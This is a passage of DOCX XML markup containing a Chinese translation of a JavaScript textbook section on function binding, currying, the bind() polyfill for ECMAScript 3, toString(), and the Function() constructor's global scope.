      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过如下代码轻易地实现这种绑定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个函数，通过调用它来调用</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的方法</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，传递它所有的实参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function bind(f,o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(f.bind)return f.bind(o);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法存在的话，使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，这样绑定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return f.apply(o,arguments);</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ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不仅仅是将函数绑定至一个对象，它还附带一些其他应用：除了第一个实参之外，传入</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的实参也会绑定至</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>，这个附带的应用是一种常见的函数式编程技术，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>有时也被称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>柯里化</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>currying</w:t>
      </w:r>
      <w:r>
        <w:t>）。参照下面这个例子中的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum=function(x,y){return x+y};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回两个实参的和值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>sum</w:t>
      </w:r>
      <w:r>
        <w:t>的新函数，但</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且第一个参数绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，这个新的函数期望只传入一个实参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var succ=sum.bind(null,1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>succ(2)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:x</w:t>
      </w:r>
      <w:r>
        <w:t>绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，并传入</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>作为实参</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(y,z){return th</w:t>
      </w:r>
      <w:r>
        <w:t>is.x+y+z};//</w:t>
      </w:r>
      <w:r>
        <w:t>另外一个做累加计算的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var g=f.bind({x:1},2);//</w:t>
      </w:r>
      <w:r>
        <w:t>绑定</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g(3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6:this.x</w:t>
      </w:r>
      <w:r>
        <w:t>绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以绑定</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值并在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中实现这个附带的应用。例</w:t>
      </w:r>
      <w:r>
        <w:t>8-5</w:t>
      </w:r>
      <w:r>
        <w:t>中的示例代码就模拟实现了标准的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，我们将这个方法另存为</w:t>
      </w:r>
      <w:r>
        <w:t>Function.prototype.bind</w:t>
      </w:r>
      <w:r>
        <w:t>，以便所有的函数对象都继承它，这种技术在</w:t>
      </w:r>
      <w:r>
        <w:t>9.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中有详细介绍：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-5</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>版本的</w:t>
      </w:r>
      <w:r>
        <w:t>Function.b</w:t>
      </w:r>
      <w:r>
        <w:t>ind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!Function.prototype.bind){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Function.prototype.bind=function(o/*,args*/){//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>的值保存至变量中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以便在后面嵌套的函数中可以使用它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var self=this,boundArgs=arguments;//bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值是一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个实参列表，将传入</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个及后续的实参都传入这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var args=[],i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>boundArgs.length;i++)args.push(boundArgs[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>for(i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++)args.push(arguments[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>现在将</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来调用，传入这些实参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return self.apply(o,args);</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我们注意到，</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的函数是一个闭包，在这个闭包的外部函数中声明了</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>boundArgs</w:t>
      </w:r>
      <w:r>
        <w:t>变量，这两个变量在闭包里用到。尽管定义闭包的内部函数已经从外</w:t>
      </w:r>
      <w:r>
        <w:t>部函数中返回，而且调用这个闭包逻辑的时刻要在外部函数返回之后（在闭包中照样可以正确访问这两个变量）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>定义的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法也有一些特性是上述</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>代码无法模拟的。首先，真正的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回一个函数对象，这个函数对象的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性是绑定函数的形参个数减去绑定实参的个数（</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>的值不能小于零）。再者，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以顺带用做构造函数。如果</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的函数用做构造函数，将忽略传入</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>t his</w:t>
      </w:r>
      <w:r>
        <w:t>，原始函数就会以</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的形式调用，其实参也已经绑定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r>
        <w:t>。由</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法所返回的函数并不包含</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性（普通函数固有的</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性是不能删除的），并且将这些绑定的函数用做构造函数时所创建的对象从原始的未绑定的构</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>造函数中继承</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>。同样，在使用</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符时，绑定构造函数和未绑定构造函数并无两样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="8_7_5_toString__Fang_Fa_"/>
      <w:r>
        <w:t>8.7.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象一样，函数也有</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>规范规定这个方法返回一个字符串，这个字符串和</w:t>
      </w:r>
      <w:r>
        <w:t>函数声明语句的语法相关。实际上，大多数（非全部）的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的实现都返回函数的完整源码。内置函数往往返回一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>"[native code]"</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串作为函数体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="8_7_6_Function__Gou_Zao_Han_Shu_"/>
      <w:r>
        <w:t>8.7.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不管是通过函数定义语句还是函数直接量表达式，函数的定义都要使用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>关键字。但函数还可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来定义，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=new Function("x","y","return x*y;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这一行代码创建一个新的函数，这个函数和通过下面代码定义的</w:t>
      </w:r>
      <w:r>
        <w:t>函数几乎等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var f=function(x,y){return x*y;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数可以传入任意数量的字符串实参，最后一个实参所表示的文本就是函数体；它可以包含任意的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句，每两条语句之间用分号分隔。传入构造函数的其他所有的实参字符串是指定函数的形参名字的字符串。如果定义的函数不包含任何参数，只须给构造函数简单地传入一个字符串</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>函数体</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数并不需要通过传入实参以指定函数名。就像函数直接量一样，</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个匿名函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数有几点需要特别注意：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>在运行时动态地创建并编译函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>每次调用</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数都会解析函数体，并创建新的函数对象。如果是在一个循环或者多次调用的函数中执行这个构造函数，执行效率会受影响。相比之下，循环中的嵌套函数和函数定义表达式则不会每次执行时都重新编译。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>最后一点，也是关</w:t>
      </w:r>
      <w:r>
        <w:t>于</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数非常重要的一点，就是它所创建的函数并不是使用词法作用域，相反，函数体代码的编译总是会在顶层函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r>
        <w:t>执行，正如下面代码所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="global";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function constructFunction(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="local";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new Function("return scope");//</w:t>
      </w:r>
      <w:r>
        <w:t>无法捕获局部作用域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这一行代码返回</w:t>
      </w:r>
      <w:r>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:t>，因为通过</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所返回的函数使用的不是局部作用域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>con</w:t>
      </w:r>
      <w:r>
        <w:t>structFunction()();//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"global"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以将</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数认为是在全局作用域中执行的</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>（参照</w:t>
      </w:r>
      <w:r>
        <w:t>4.12.2</w:t>
      </w:r>
      <w:r>
        <w:t>节），</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>可以在自己的私有作用域内定义新变量和函数，</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数在实际编程过程中很少会用到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="8_7_7_Ke_Diao_Yong_De_Dui_Xiang_"/>
      <w:r>
        <w:t>8.7.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　可调用的对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们在</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节中提到</w:t>
